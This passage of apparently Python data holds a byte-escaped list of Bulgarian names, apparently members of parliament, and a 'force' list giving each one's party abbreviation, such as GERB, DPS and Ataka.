\xd0\x9d\xd0\x90\xd0\x99\xd0\x94\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x9e\xd0\xa0\xd0\x90 \xd0\x98\xd0\x9b\xd0\x98\xd0\x95\xd0\x92\xd0\x90 \xd0\xaf\xd0\x9d\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x95\xd0\x9c\xd0\x98\xd0\x9b \xd0\xa1\xd0\xa2\xd0\xa0\xd0\x90\xd0\xa5\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x90\xd0\x94\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\xa0\xd0\xa3\xd0\x9c\xd0\x95\xd0\x9d \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\x93\xd0\x95\xd0\xa7\xd0\x95\xd0\x92', '\xd0\x9f\xd0\x9b\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\x9e\xd0\x92', '\xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d \xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 \xd0\xa6\xd0\x9e\xd0\x9d\xd0\x95\xd0\x92', '\xd0\x98\xd0\x9b\xd0\x98\xd0\xaf \xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92 \xd0\x91\xd0\x90\xd0\xa2\xd0\x90\xd0\xa8\xd0\x9a\xd0\x98', '\xd0\x9a\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\x9a\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x90\xd0\x94\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9b\xd0\xaa\xd0\xa7\xd0\x95\xd0\x97\xd0\x90\xd0\xa0 \xd0\x91\xd0\x9e\xd0\x93\xd0\x9e\xd0\x9c\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x98\xd0\xa5\xd0\x90\xd0\x98\xd0\x9b \xd0\xa0\xd0\x90\xd0\x99\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x98\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\x9c\xd0\xa3\xd0\xa2\xd0\x90\xd0\xa4\xd0\xa7\xd0\x98\xd0\x95\xd0\x92', '\xd0\x9f\xd0\x90\xd0\x92\xd0\x95\xd0\x9b \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa8\xd0\x9e\xd0\x9f\xd0\x9e\xd0\x92', '\xd0\x91\xd0\x9e\xd0\x99\xd0\x9a\xd0\x9e \xd0\x9c\xd0\x95\xd0\xa2\xd0\x9e\xd0\x94\xd0\x98\xd0\x95\xd0\x92 \xd0\x91\xd0\x9e\xd0\xa0\xd0\x98\xd0\xa1\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x95\xd0\x9d\xd0\xa6\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\x90\xd0\xa1\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9b\xd0\x90\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x90\xd0\xa8\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x93\xd0\x9e\xd0\xa0\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x9e\xd0\x9b\xd0\x95\xd0\x9d \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92 \xd0\xa1\xd0\x98\xd0\x94\xd0\x95\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x95\xd0\x9b\xd0\xaf\xd0\x9d \xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x90\xd0\x9d\xd0\x94\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x94\xd0\x9e\xd0\x91\xd0\xa0\xd0\x95\xd0\x92', '\xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b \xd0\x9a\xd0\xa0\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\x9b\xd0\x95\xd0\x92', '\xd0\x94\xd0\x95\xd0\x9b\xd0\xaf\xd0\x9d \xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\xa7\xd0\x95\xd0\x92 \xd0\x9f\xd0\x95\xd0\x95\xd0\x92\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\x94\xd0\x95\xd0\x9d\xd0\x98\xd0\xa6\xd0\x90 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90 \xd0\x93\xd0\x90\xd0\x94\xd0\x96\xd0\x95\xd0\x92\xd0\x90', '\xd0\x94\xd0\x95\xd0\xa1\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\x9e\xd0\x92 \xd0\xa7\xd0\xa3\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x98\xd0\xa0\xd0\x95\xd0\x9d\xd0\x90 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9a\xd0\x9e\xd0\xa6\xd0\x95\xd0\x92\xd0\x90', '\xd0\x98\xd0\x92\xd0\x90\xd0\x99\xd0\x9b\xd0\x9e \xd0\x90\xd0\x9d\xd0\x93\xd0\x95\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x9e\xd0\xa1\xd0\x9a\xd0\x9e\xd0\x92\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\x9c\xd0\x90\xd0\xa0\xd0\x93\xd0\x90\xd0\xa0\xd0\x98\xd0\xa2\xd0\x90 \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x95\xd0\x92\xd0\x90 \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x98\xd0\x9b\xd0\x98\xd0\x90\xd0\x9d \xd0\xa1\xd0\x90\xd0\xa8\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x9b\xd0\x98\xd0\x9b\xd0\xaf\xd0\x9d\xd0\x90 \xd0\x9f\xd0\x90\xd0\x92\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x92\xd0\xaa\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92 \xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\xa3\xd0\xa8\xd0\x95\xd0\x92', '\xd0\x9b\xd0\xae\xd0\x91\xd0\x9e\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x9b\xd0\xae\xd0\xa2\xd0\x92\xd0\x98 \xd0\x90\xd0\xa5\xd0\x9c\xd0\x95\xd0\x94 \xd0\x9c\xd0\x95\xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d', '\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x99 \xd0\x92\xd0\x95\xd0\xa1\xd0\x95\xd0\x9b\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x90\xd0\x9d\xd0\x94\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\xa0\xd0\x90\xd0\x9c\xd0\x90\xd0\x94\xd0\x90\xd0\x9d \xd0\x91\xd0\x90\xd0\x99\xd0\xa0\xd0\x90\xd0\x9c \xd0\x90\xd0\xa2\xd0\x90\xd0\x9b\xd0\x90\xd0\x99', '\xd0\xa1\xd0\x95\xd0\xa0\xd0\x93\xd0\x95\xd0\x99 \xd0\x94\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x98\xd0\x95\xd0\x92\xd0\x98\xd0\xa7 \xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d\xd0\x98\xd0\xa8\xd0\x95\xd0\x92', '\xd0\xa1\xd0\xa2\xd0\x95\xd0\xa4\xd0\x90\xd0\x9d \xd0\x9b\xd0\x90\xd0\x9c\xd0\x91\xd0\x9e\xd0\x92 \xd0\x94\xd0\x90\xd0\x9d\xd0\x90\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d \xd0\x93\xd0\x95\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92 \xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\xa8\xd0\x95\xd0\x9d\xd0\x94\xd0\x9e\xd0\x90\xd0\x9d \xd0\xa0\xd0\x95\xd0\x9c\xd0\x97\xd0\x98 \xd0\xa5\xd0\x90\xd0\x9b\xd0\x98\xd0\xa2', '\xd0\xaf\xd0\x92\xd0\x9e\xd0\xa0 \xd0\x91\xd0\x9e\xd0\x96\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x9d\xd0\x9e\xd0\xa2\xd0\x95\xd0\x92', '\xd0\xaf\xd0\x9d\xd0\x90\xd0\x9a\xd0\x98 \xd0\x91\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\xa0\xd0\x90\xd0\x94\xd0\x98 \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\xa2\xd0\x9e\xd0\xa8\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x9a\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x98\xd0\xaf\xd0\x9d \xd0\xa0\xd0\x9e\xd0\x91\xd0\x95\xd0\xa0\xd0\xa2 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x90\xd0\x9d\xd0\x94\xd0\x9e\xd0\x9d \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x90\xd0\x9d\xd0\x94\xd0\x9e\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x98\xd0\x92\xd0\x90\xd0\x9d \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x95\xd0\xa5\xd0\x9c\xd0\x95\xd0\x94 \xd0\xae\xd0\x9c\xd0\x95\xd0\xa0 \xd0\x90\xd0\xa2\xd0\x90\xd0\x9c\xd0\x90\xd0\x9d', '\xd0\x9a\xd0\x90\xd0\x9b\xd0\x98\xd0\x9d\xd0\x90 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x91\xd0\x90\xd0\x9b\xd0\x90\xd0\x91\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9d\xd0\x98\xd0\x93\xd0\xaf\xd0\xa0 \xd0\xa1\xd0\x90\xd0\xa5\xd0\x9b\xd0\x98\xd0\x9c \xd0\x94\xd0\x96\xd0\x90\xd0\xa4\xd0\x95\xd0\xa0', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x99\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9f\xd0\xaa\xd0\x94\xd0\x95\xd0\x92', '\xd0\x97\xd0\x90\xd0\xa5\xd0\x90\xd0\xa0\xd0\x98 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x90\xd0\xa0\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x95\xd0\x9a\xd0\x90\xd0\xa2\xd0\x95\xd0\xa0\xd0\x98\xd0\x9d\xd0\x90 \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92\xd0\x90 \xd0\x97\xd0\x90\xd0\xaf\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9c\xd0\x98\xd0\x93\xd0\x9b\xd0\x95\xd0\x9d\xd0\x90 \xd0\x94\xd0\x9e\xd0\x99\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90 \xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x90\xd0\x9d\xd0\x94\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9b\xd0\x90\xd0\x97\xd0\x90\xd0\xa0 \xd0\x9e\xd0\x93\xd0\x9d\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x9e\xd0\x9f\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x90\xd0\xa0\xd0\x93\xd0\x90\xd0\xa0\xd0\x98\xd0\xa2\xd0\x90 \xd0\x90\xd0\xa1\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x96\xd0\x90\xd0\xa0\xd0\x90 \xd0\x92\xd0\x95\xd0\xa1\xd0\x95\xd0\x9b\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9f\xd0\x95\xd0\x9d\xd0\x95\xd0\x92\xd0\x90-\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92\xd0\x90', '\xd0\x95\xd0\x92\xd0\x94\xd0\x9e\xd0\x9a\xd0\x98\xd0\xaf \xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\xa7\xd0\x9e\xd0\x92\xd0\x90 \xd0\x90\xd0\xa1\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9c\xd0\x95\xd0\xa2\xd0\x9e\xd0\x94\xd0\x98 \xd0\xa2\xd0\x95\xd0\x9e\xd0\xa5\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x90\xd0\x94\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\xa1\xd0\x95\xd0\xa0\xd0\x93\xd0\x95\xd0\x99 \xd0\x9c\xd0\x90\xd0\x9d\xd0\xa3\xd0\xa8\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x98\xd0\xa7\xd0\x98\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\xa5\xd0\x90\xd0\x9c\xd0\x98 \xd0\x98\xd0\x91\xd0\xa0\xd0\x90\xd0\xa5\xd0\x98\xd0\x9c\xd0\x9e\xd0\x92 \xd0\xa5\xd0\x90\xd0\x9c\xd0\x98\xd0\x95\xd0\x92', '\xd0\x9a\xd0\x90\xd0\x9b\xd0\x98\xd0\x9d \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x98\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92 \xd0\x91\xd0\x9e\xd0\xa0\xd0\x98\xd0\xa1\xd0\x9e\xd0\x92', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x90\xd0\x9d\xd0\x94\xd0\xa0\xd0\x95\xd0\x95\xd0\x92', '\xd0\xa2\xd0\x90\xd0\xa1\xd0\x9a\xd0\x9e \xd0\x9c\xd0\x98\xd0\xa5\xd0\x90\xd0\x99\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x95\xd0\xa0\xd0\x9c\xd0\x95\xd0\x9d\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x95\xd0\x9d\xd0\x9a\xd0\x9e \xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92 \xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x9b\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92 \xd0\x96\xd0\x95\xd0\x9b\xd0\xaf\xd0\x97\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x90\xd0\x9d\xd0\x94\xd0\xaa\xd0\xa0 \xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x95\xd0\xa2\xd0\x9e\xd0\x94\xd0\x98\xd0\x95\xd0\x92', '\xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x98 \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\x90\xd0\x9b\xd0\x95\xd0\x9a\xd0\xa1\xd0\x98\xd0\x95\xd0\x92', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x98\xd0\x9b\xd0\x98\xd0\x95\xd0\x92 \xd0\xaf\xd0\x9a\xd0\x98\xd0\x9c\xd0\x9e\xd0\x92', '\xd0\x9d\xd0\x95\xd0\x9b\xd0\x98 \xd0\xa0\xd0\xa3\xd0\xa1\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90']
force = ['\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x9a\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\xa1\xd0\x9a', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x9a\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x9a\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\xa1\xd0\x9a', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', 